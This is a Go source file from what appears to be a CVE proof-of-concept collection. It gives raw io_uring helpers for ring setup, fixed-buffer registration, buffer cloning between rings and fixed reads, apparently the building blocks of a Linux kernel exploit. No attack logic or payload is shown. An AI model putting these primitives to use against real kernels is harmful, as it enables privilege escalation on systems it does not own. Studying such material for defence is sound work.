5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / iouring.go GO
package main

import (
	"fmt"
	"sync/atomic"
	"syscall"
	"unsafe"
)

// Numeric constants for the raw io_uring interface used by the helpers in this
// file. The values are hard-coded rather than taken from a package.
// NOTE(review): presumably these match the Linux UAPI headers for the target
// architecture — confirm before building for another platform.
const (
	// Syscall numbers used for io_uring_setup, io_uring_enter and
	// io_uring_register respectively.
	sysIoUringSetup    = 425
	sysIoUringEnter    = 426
	sysIoUringRegister = 427

	// mmap offsets passed with the ring fd to select which shared region is
	// mapped: the SQ ring, the CQ ring, or the SQE array.
	iORING_OFF_SQ_RING = 0
	iORING_OFF_CQ_RING = 0x8000000
	iORING_OFF_SQES    = 0x10000000

	// Opcodes passed as the second argument of the io_uring_register syscall.
	iORING_REGISTER_BUFFERS      = 0
	iORING_REGISTER_CLONE_BUFFERS = 30

	// SQE opcode written by uringSubmitReadFixed.
	iORING_OP_READ_FIXED = 4

	// Flag passed to io_uring_enter by uringSubmitReadFixed.
	iORING_ENTER_GETEVENTS = 1
)

// io_uring_params layout (kernel ABI)
//
// iouringParams is passed by pointer to the io_uring_setup syscall in
// uringSetup. After the call, uringSetup reads sqEntries and cqEntries to size
// the mappings and sqOff/cqOff to locate the ring fields inside them.
// Field order and widths must not change: the struct is handed to the kernel
// as raw memory.
type iouringParams struct {
	sqEntries    uint32
	cqEntries    uint32
	flags        uint32
	sqThreadCPU  uint32
	sqThreadIdle uint32
	features     uint32
	wqFd         uint32
	resv         [3]uint32
	sqOff        sqringOffsets
	cqOff        cqringOffsets
}

// sqringOffsets holds byte offsets of the submission-queue ring fields,
// relative to the start of the SQ ring mapping. It is embedded in
// iouringParams; uringSetup adds head, tail, ringMask and array to the mapping
// base to obtain pointers, and uses array when computing the mapping size.
// The remaining fields are not read anywhere in this file.
type sqringOffsets struct {
	head        uint32
	tail        uint32
	ringMask    uint32
	ringEntries uint32
	flags       uint32
	dropped     uint32
	array       uint32
	resv1       uint32
	userAddr    uint64
}

// cqringOffsets holds byte offsets of the completion-queue ring fields,
// relative to the start of the CQ ring mapping. It is embedded in
// iouringParams; uringSetup adds head, tail, ringMask and cqes to the mapping
// base to obtain pointers, and uses cqes when computing the mapping size.
// The remaining fields are not read anywhere in this file.
type cqringOffsets struct {
	head        uint32
	tail        uint32
	ringMask    uint32
	ringEntries uint32
	overflow    uint32
	cqes        uint32
	flags       uint32
	resv1       uint32
	userAddr    uint64
}

// io_uring_sqe - 64 bytes
//
// iouringSQE is one submission-queue entry. uringSubmitReadFixed overlays this
// type on the mapped SQE array using a 64-byte stride, so the field order and
// sizes must keep the struct at exactly 64 bytes.
// Of these fields, this file only ever sets opcode, fd, off, addr, length,
// bufIndex and userData; everything else is left zero.
type iouringSQE struct {
	opcode   uint8
	flags    uint8
	ioprio   uint16
	fd       int32
	off      uint64
	addr     uint64
	length   uint32
	rwFlags  uint32
	userData uint64
	bufIndex uint16
	personality uint16
	spliceFdIn int32
	addr3    uint64
	pad2     uint64
}

// io_uring_cqe
//
// iouringCQE is one completion-queue entry. uringWaitCQE indexes the mapped
// CQE array with a 16-byte stride and returns the res field of the entry at
// the current head; userData and flags are not read in this file.
type iouringCQE struct {
	userData uint64
	res      int32
	flags    uint32
}

// io_uring_clone_buffers
//
// iouringCloneBuffers is the argument passed by pointer to io_uring_register
// with iORING_REGISTER_CLONE_BUFFERS. uringCloneBuffers fills in only srcFd
// (the source ring's fd) and leaves every other field zero.
type iouringCloneBuffers struct {
	srcFd  uint32
	flags  uint32
	srcOff uint32
	dstOff uint32
	nr     uint32
	pad    [3]uint32
}

// uring bundles the state of one io_uring instance as set up by uringSetup:
// the ring file descriptor, the three mmap'ed regions with their sizes, and
// pointers into those regions for the fields the helpers touch.
type uring struct {
	// fd is the descriptor returned by io_uring_setup; uringDestroy sets it
	// to -1 after closing it.
	fd       int
	// Base addresses of the SQ ring, CQ ring and SQE array mappings
	// (0 means "not mapped" to uringDestroy).
	sqRing   uintptr
	cqRing   uintptr
	sqes     uintptr
	// Byte lengths of the corresponding mappings, needed for unmapping.
	sqRingSz uintptr
	cqRingSz uintptr
	sqesSz   uintptr
	// Pointers into the SQ ring mapping.
	sqHead   *uint32
	sqTail   *uint32
	sqMask   *uint32
	sqArray  *uint32
	// Pointers into the CQ ring mapping; cqes points at the first CQE.
	cqHead   *uint32
	cqTail   *uint32
	cqMask   *uint32
	cqes     *iouringCQE
}

// uringSetup creates an io_uring instance with the requested number of
// submission entries and maps its three shared regions (SQ ring, CQ ring and
// SQE array) into the process.
//
// On success it returns a *uring that owns the ring fd and the mappings; the
// caller releases them with uringDestroy. On failure every resource acquired
// so far is released and the failing syscall's errno is returned wrapped.
func uringSetup(entries uint32) (*uring, error) {
	var p iouringParams
	fd, _, errno := syscall.Syscall(sysIoUringSetup, uintptr(entries), uintptr(unsafe.Pointer(&p)), 0)
	if errno != 0 {
		return nil, fmt.Errorf("io_uring_setup: %w", errno)
	}

	r := &uring{fd: int(fd)}

	// Region sizes: each ring ends with its trailing array (4-byte SQ index
	// slots, 16-byte CQEs); the SQE array holds 64-byte entries.
	r.sqRingSz = uintptr(p.sqOff.array) + uintptr(p.sqEntries)*4
	r.cqRingSz = uintptr(p.cqOff.cqes) + uintptr(p.cqEntries)*16
	r.sqesSz = uintptr(p.sqEntries) * 64

	// mapRegion maps size bytes of the ring fd at the given magic offset.
	mapRegion := func(size, offset uintptr) (uintptr, syscall.Errno) {
		addr, _, e := syscall.Syscall6(syscall.SYS_MMAP, 0, size,
			syscall.PROT_READ|syscall.PROT_WRITE,
			syscall.MAP_SHARED|syscall.MAP_POPULATE,
			fd, offset)
		return addr, e
	}
	// unmap releases a region obtained from mapRegion. The raw syscall is
	// required: syscall.Munmap only accepts slices handed out by syscall.Mmap
	// and returns EINVAL for anything else, which would leak the mapping.
	// Cleanup is best effort, so the result is deliberately ignored.
	unmap := func(addr, size uintptr) {
		syscall.Syscall(syscall.SYS_MUNMAP, addr, size, 0)
	}

	sqRing, errno := mapRegion(r.sqRingSz, iORING_OFF_SQ_RING)
	if errno != 0 {
		syscall.Close(int(fd))
		return nil, fmt.Errorf("mmap sq_ring: %w", errno)
	}
	r.sqRing = sqRing

	cqRing, errno := mapRegion(r.cqRingSz, iORING_OFF_CQ_RING)
	if errno != 0 {
		unmap(sqRing, r.sqRingSz)
		syscall.Close(int(fd))
		return nil, fmt.Errorf("mmap cq_ring: %w", errno)
	}
	r.cqRing = cqRing

	sqes, errno := mapRegion(r.sqesSz, iORING_OFF_SQES)
	if errno != 0 {
		unmap(cqRing, r.cqRingSz)
		unmap(sqRing, r.sqRingSz)
		syscall.Close(int(fd))
		return nil, fmt.Errorf("mmap sqes: %w", errno)
	}
	r.sqes = sqes

	// Resolve the ring fields the helpers use from the kernel-reported offsets.
	r.sqHead = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.head)))
	r.sqTail = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.tail)))
	r.sqMask = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.ringMask)))
	r.sqArray = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.array)))
	r.cqHead = (*uint32)(unsafe.Pointer(cqRing + uintptr(p.cqOff.head)))
	r.cqTail = (*uint32)(unsafe.Pointer(cqRing + uintptr(p.cqOff.tail)))
	r.cqMask = (*uint32)(unsafe.Pointer(cqRing + uintptr(p.cqOff.ringMask)))
	r.cqes = (*iouringCQE)(unsafe.Pointer(cqRing + uintptr(p.cqOff.cqes)))

	logf("io_uring fd=%d sq_ring@%#x(sz=%#x) cq_ring@%#x(sz=%#x) sqes@%#x(sz=%#x)",
		fd, sqRing, r.sqRingSz, cqRing, r.cqRingSz, sqes, r.sqesSz)
	return r, nil
}

// uringRegisterBuffers registers a single fixed buffer, described by its
// start address buf and byte length, with ring r via io_uring_register.
// It returns the wrapped errno if the syscall fails.
func uringRegisterBuffers(r *uring, buf uintptr, length uintptr) error {
	var vec syscall.Iovec
	vec.Base = (*byte)(unsafe.Pointer(buf))
	vec.Len = uint64(length)

	// One iovec is passed, hence nr_args == 1.
	if _, _, errno := syscall.Syscall6(
		sysIoUringRegister,
		uintptr(r.fd),
		iORING_REGISTER_BUFFERS,
		uintptr(unsafe.Pointer(&vec)),
		1, 0, 0,
	); errno != 0 {
		return fmt.Errorf("io_uring_register buffers: %w", errno)
	}
	return nil
}

// uringCloneBuffers issues io_uring_register with
// iORING_REGISTER_CLONE_BUFFERS on dst, naming src's fd as the source ring.
// All other fields of the request are left zero. It returns the wrapped errno
// if the syscall fails.
func uringCloneBuffers(dst, src *uring) error {
	var req iouringCloneBuffers
	req.srcFd = uint32(src.fd)

	if _, _, errno := syscall.Syscall6(
		sysIoUringRegister,
		uintptr(dst.fd),
		iORING_REGISTER_CLONE_BUFFERS,
		uintptr(unsafe.Pointer(&req)),
		1, 0, 0,
	); errno != 0 {
		return fmt.Errorf("io_uring clone buffers: %w", errno)
	}
	return nil
}

// uringSubmitReadFixed queues one READ_FIXED request on r and calls
// io_uring_enter to submit it and wait for one completion.
//
// The request reads length bytes from offset 0 of fileFd into the address buf,
// using registered buffer index 0 and user_data 0x1234. It returns the wrapped
// errno if io_uring_enter fails.
func uringSubmitReadFixed(r *uring, fileFd int, buf uintptr, length uint32) error {
	curTail := atomic.LoadUint32(r.sqTail)
	slot := curTail & *r.sqMask

	// Fill the SQE for this slot; fields not named here are zero.
	entry := (*iouringSQE)(unsafe.Pointer(r.sqes + 64*uintptr(slot)))
	*entry = iouringSQE{
		opcode:   iORING_OP_READ_FIXED,
		fd:       int32(fileFd),
		off:      0,
		addr:     uint64(buf),
		length:   length,
		userData: 0x1234,
		bufIndex: 0,
	}

	// Point the SQ index array at the SQE, then publish the new tail. The
	// atomic store comes last so the entry is fully written beforehand.
	arraySlot := (*uint32)(unsafe.Pointer(uintptr(unsafe.Pointer(r.sqArray)) + 4*uintptr(slot)))
	*arraySlot = slot
	atomic.StoreUint32(r.sqTail, curTail+1)

	// to_submit = 1, min_complete = 1.
	if _, _, errno := syscall.Syscall6(
		sysIoUringEnter,
		uintptr(r.fd),
		1, 1,
		iORING_ENTER_GETEVENTS,
		0, 0,
	); errno != 0 {
		return fmt.Errorf("io_uring_enter: %w", errno)
	}
	return nil
}

// uringWaitCQE polls the completion queue of r until an entry is available,
// sleeping 1ms between checks for at most 1000 checks. It returns the res
// field of the entry at the current head and advances the head by one.
// If no entry appears in time it returns a "CQE timeout" error.
func uringWaitCQE(r *uring) (int32, error) {
	const (
		maxPolls       = 1000
		pollIntervalNs = 1_000_000
	)

	head := atomic.LoadUint32(r.cqHead)
	for polls := 0; polls < maxPolls && atomic.LoadUint32(r.cqTail) == head; polls++ {
		syscall.Nanosleep(&syscall.Timespec{Nsec: pollIntervalNs}, nil)
	}

	// Re-read the tail once more so the final sleep still gets a check.
	if atomic.LoadUint32(r.cqTail) == head {
		return 0, fmt.Errorf("CQE timeout")
	}

	slot := head & *r.cqMask
	entry := (*iouringCQE)(unsafe.Pointer(uintptr(unsafe.Pointer(r.cqes)) + 16*uintptr(slot)))
	result := entry.res

	// Consume the entry only after its result has been copied out.
	atomic.StoreUint32(r.cqHead, head+1)
	return result, nil
}

// uringDestroy releases everything owned by r: the SQE array, CQ ring and SQ
// ring mappings (in that order) and then the ring fd. A nil r is a no-op.
//
// After the call the mapping addresses are zeroed, the pointers derived from
// them are nil and fd is -1, so calling uringDestroy again on the same value
// does nothing.
func uringDestroy(r *uring) {
	if r == nil {
		return
	}

	// unmap releases one region and clears its recorded address. The raw
	// syscall is required: syscall.Munmap only accepts slices handed out by
	// syscall.Mmap and returns EINVAL for anything else, so the regions would
	// never be unmapped. Teardown is best effort, so the result is ignored.
	unmap := func(addr *uintptr, size uintptr) {
		if *addr == 0 {
			return
		}
		syscall.Syscall(syscall.SYS_MUNMAP, *addr, size, 0)
		*addr = 0
	}
	unmap(&r.sqes, r.sqesSz)
	unmap(&r.cqRing, r.cqRingSz)
	unmap(&r.sqRing, r.sqRingSz)

	// These pointed into the regions just unmapped; drop them so later misuse
	// fails on a nil pointer instead of touching unmapped or reused memory.
	r.sqHead, r.sqTail, r.sqMask, r.sqArray = nil, nil, nil, nil
	r.cqHead, r.cqTail, r.cqMask, r.cqes = nil, nil, nil, nil

	if r.fd >= 0 {
		syscall.Close(r.fd)
		r.fd = -1
	}
}